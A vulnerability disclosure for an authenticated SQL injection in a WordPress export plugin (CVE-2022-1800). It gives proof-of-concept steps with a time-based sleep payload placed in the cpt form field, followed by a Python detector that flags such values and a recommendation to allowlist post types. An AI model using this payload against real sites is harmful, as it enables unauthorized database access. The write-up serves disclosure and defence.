During security research, I found an authenticated SQL injection vulnerability. The plugin is Export any WordPress data to XML/CSV, and the affected versions are: < 1.3.5

Description

The plugin does not sanitize the cpt POST parameter when exporting post data before using it in a database query, leading to an SQL injection vulnerability.

POC

1. Go to the All Export > New Export screen in the WordPress admin.

2. Now click on Specific Post Type > Posts.

3. Click on Migrate Posts, intercept the request, and look for the form field named cpt:

Content-Disposition: form-data; name="cpt"

post

Change it to:

Content-Disposition: form-data; name="cpt"

post'+(select*from(select(sleep(10)))a)+'

The response will now be delayed by 10 seconds, confirming the SQL injection vulnerability.
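For defenders, the following is an added example (not code from the plugin or from the original write-up) that parses a multipart/form-data request body and flags any cpt field whose value cannot be a WordPress post type key. It assumes cpt is meant to carry a single post type key (lowercase letters, digits, dashes and underscores, at most 20 characters); the boundary, helper names and sample requests are constructed for illustration.

```python
import re
from email import message_from_bytes
from email.policy import HTTP

# WordPress post type keys: lowercase alphanumerics, '-' and '_', max 20 chars.
POST_TYPE_KEY = re.compile(r"[a-z0-9_-]{1,20}")

# Constructed sample data: boundary and requests are made up for this example.
BOUNDARY = "constructedboundary123"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
PAGE_VALUE = "post'+(select*from(select(sleep(10)))a)+'"  # value shown in the PoC


def build_body(fields):
    """Build a multipart/form-data body from (name, value) pairs (sample input)."""
    parts = [
        f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
        for n, v in fields
    ]
    return ("".join(parts) + f"--{BOUNDARY}--\r\n").encode()


def form_fields(content_type, body):
    """Yield (name, value) for each part of a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = message_from_bytes(raw, policy=HTTP)
    if not msg.is_multipart():
        return
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        value = part.get_payload(decode=True) or b""
        yield name, value.decode("utf-8", "replace")


def suspicious_cpt(content_type, body):
    """Return every cpt value that is not a syntactically valid post type key."""
    return [
        value
        for name, value in form_fields(content_type, body)
        if name == "cpt" and not POST_TYPE_KEY.fullmatch(value)
    ]


if __name__ == "__main__":
    benign = build_body([("action", "export"), ("cpt", "post")])
    tampered = build_body([("action", "export"), ("cpt", PAGE_VALUE)])
    print("benign:", suspicious_cpt(CONTENT_TYPE, benign))
    print("tampered:", suspicious_cpt(CONTENT_TYPE, tampered))
```

The same allowlist check applies server-side: rejecting any cpt value that is not a registered post type before it reaches the query removes the injection point regardless of how the query is built.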

Additional information

WPSCAN link: https://wpscan.com/vulnerability/4267109c-0ca2-441d-889d-fb39c235f128

NIST CVSS SCORE: 7.2

NIST LINK: https://nvd.nist.gov/vuln/detail/CVE-2022-1800

The plugin has 90,000+ active installations.